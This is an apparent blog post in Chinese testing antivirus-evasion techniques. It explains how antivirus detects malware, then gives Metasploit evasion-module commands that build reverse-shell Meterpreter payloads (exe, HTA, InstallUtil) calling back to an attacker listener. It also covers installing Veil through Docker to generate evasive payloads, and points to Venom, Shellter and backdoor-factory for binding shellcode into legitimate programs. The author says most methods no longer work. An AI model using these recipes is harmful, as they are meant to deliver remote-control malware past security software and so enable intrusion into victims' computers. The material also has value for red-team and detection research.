zoukankan      html  css  js  c++  java
  • 一些免杀方法测试

    时至今日,我所了解的很多免杀的手段都已经失效了,最近又测试了一些免杀方法(感谢各位大佬的无私奉献,泪目),列举了一些过去相对来说还算可用的办法供参考(绝大多数都过不了的就算了不列举了,这个“绝大多数”是个相对概念,有的能过有的不能)

    随着安防产品越来越多、功能越来越强大,在某种意义上来说,防御是作为一种知识的累积,如果攻击手段没有更新的突破而完全靠吃老本是混不下去的

    我也相信一定是有能全免杀的方法的,只是我不知道也没研究出个所以然而已(太菜了)

    但也没必要沮丧,针对不同的杀软选择不同的免杀策略还是可以混一混的,有的方法过不了这个或许可以过另一个

    本文仅做网上过去常说的一些“免杀”方法的展示,而非对目前绝对免杀方法的介绍

    实际上可用的免杀必须是静态、行为都免杀,现在免杀几个月之后可能就不免杀了(国内软件主要针对的是某数字和某绒,本文中的“过不了”主要是指过不了这两款杀软,并不是说所有杀软都过不了)

     当前杀软查杀的几个原理:

    (1)特征码:杀软会抽取相关文件的部分特征代码进行识别,有文件特征码和内存特征码

    (2)行为检测:针对敏感操作进行监视,有异常说明有病毒行为

    (3)文件校验和:会记录正常文件的校验和,有异常说明感染病毒

    (4)云查杀:“云”,懂得都懂,海量的特征数据规则,干死你

    (5)机器学习:内容行为+算法

     ......

    与之对应的免杀思路大致有:改特征码(关键是如何定位)、加花指令(垃圾数据影响特征码偏移)、加壳(先运行壳再由壳把加密程序还原到内存再运行程序)、多重编译(用编辑器多次编码)、分离免杀(shellcode与加载器分离)、修改资源(绕白名单进行某些资源伪造)......

     既然敢放到VT上,就不怕,以测试和回顾为主,这些方法都不是新东西,对于免杀效果也不能做过高期望,只要爆出来,99%会失效(尝试过非常多的办法,无一例外联网GG了)

    关于针对不同杀软的各种工具实在太太太多了(整理不完了),本文原打算列举一些方法,测试效果发现不大理想(写不下去了),这篇文章就不删除了

    后续文章可能会改变思路,针对某款杀毒软件写特定专题从工具代码结合的角度来整理,不然太乱脑壳痛

    1.msf  evasion模块

    一端监听,另一端执行回连的套路

    (1)生成exe

    依次执行

    use windows/windows_defender_exe

    set filename payload.exe

    set payload windows/meterpreter/reverse_tcp

    set LHOST 192.168.32.129

    set LPORT 2333

    run

     把这个路径下的payload.exe mv到你能找到的路径下

    啊,呵呵,不怎么样,能报毒的过半了

     

    (2)生成hta

    use windows/windows_defender_js_hta

    好一些了

     

     (3)生成install_util

    use windows/applocker_evasion_install_util

    set filename payload.txt

    set payload windows/meterpreter/reverse_tcp

    set LHOST 192.168.32.129

    set LPORT 2333

    run

    生成txt文件需要用csc.exe进行编译生成payload.exe文件,还要用InstallUtil.exe /logfile= /LogToConsole=false /U payload.exe来加载执行

    以上三种过去还行,但截止至今日,看似还行实则GG,测试发现过不了行为这一关

    还有一些与代码结合的方法等到后面代码部分再说

    msf剩下的方法无论是用shitaka_ga_nai多次编码,还是捆绑到另一个软件上执行,还是多种方法组合,然并卵, 效果都一般般,不能说没有用,只能说差强人意

    2.veil

    veil、venom、shellter免杀工具三剑客(安装都很复杂)

    这是一个老牌的工具了,时至今日,尚能饭否?

    测试一下

    安装这东西属实恶心,网上有人说

    apt -y install veil

    /usr/share/veil/config/setup.sh --force --silent

    啊,你可以试试,反正我是各种依赖问题,最后也没成(有人说安装复杂,我不信,然后就踩坑了)

    算了,用docker(在kali上安装docker竟然也出问题,最后换成浙大的zju解决了

    vim /etc/apt/sources.list  加上浙大源

    deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free

    deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free

    之后执行

    curl -fsSL http://mirrors.zju.edu.cn/docker-ce/linux/debian/gpg | sudo apt-key add -  

    echo 'deb http://mirrors.zju.edu.cn/docker-ce/linux/debian/ buster stable' | sudo tee /etc/apt/sources.list.d/docker.list  

    sudo apt-get update  

    sudo apt-get install docker-ce

    docker安装成功

    以下案例是在我机器中成功的,网上也有一些其他的办法,你也可以尝试,总有适合自己环境的

    之后

    systemctl daemon-reload

    systemctl restart docker

    service docker restart

    docker pull mattiasohlsson/veil

    docker run -it -v /tmp/veil-output:/var/lib/veil/output:Z mattiasohlsson/veil                  (将宿主机的/tmp/veil-output映射到docker里,可使veil在宿主机kali中直接使用)

     

     然后关了可以这么进入(别忘了映射!最好还是按照上面的命令进入不要这么来)

     两种工具推荐使用第一个Evasion(做文件免杀的)

    在Veil>:中输入

    use 1

    list

    可见很多payloads

     

     推荐使用go或者ruby的payload,  Python、c等基于一些众人皆知的原因比较容易被干

     选用了go的16号payload

     

    看情况写吧

     

    完成

     

    由于做过映射,在宿主机kali中相应目录可以找到生成的exe文件

     

    之后故技重施,在msf中启动监听

     看看就好,我这里没过本地杀软静态,实际上测试效果也不理想

     

    3.Venom

    也是一个老工具了

    安装也是极其复杂,需要的东西太多,体验极差

    我是死活安不上wine32所以作罢了

    感兴趣可以看这篇文章  https://blog.csdn.net/qq_38228830/article/details/86182770

    4.Shellter

    三剑客最后一个,是一款开源的免杀工具

    同样需要wine32

    感兴趣可以看这篇文章 https://www.cnblogs.com/hkleak/p/12912706.html

    5.backdoor-factory

    BDF也是一个老工具了,kali自带但确实有问题,自己下吧

    思路是把shellcode插入正常文件代码中,也就是说需要一个被捆绑的宿主

     感兴趣推荐这篇文章 https://www.cnblogs.com/-qing-/p/11421709.html

    未完停更,禁止转载

  • 相关阅读:
    【BZOJ2288】生日礼物 [贪心]
    Tinyhttpd阅读笔记
    数据结构-图-经典算法(三)
    数据结构-图-经典算法(二)
    数据结构-图-经典算法(一)
    TCP协议的滑动窗口协议以及流量控制
    2016腾讯实习电话面试总结---2016-03-10
    B树,B+树,B*树
    平衡二叉树(AVL树)
    二叉搜索树(二叉查找树,二叉排序树)
  • 原文地址:https://www.cnblogs.com/lcxblogs/p/14029301.html
Copyright © 2011-2022 走看看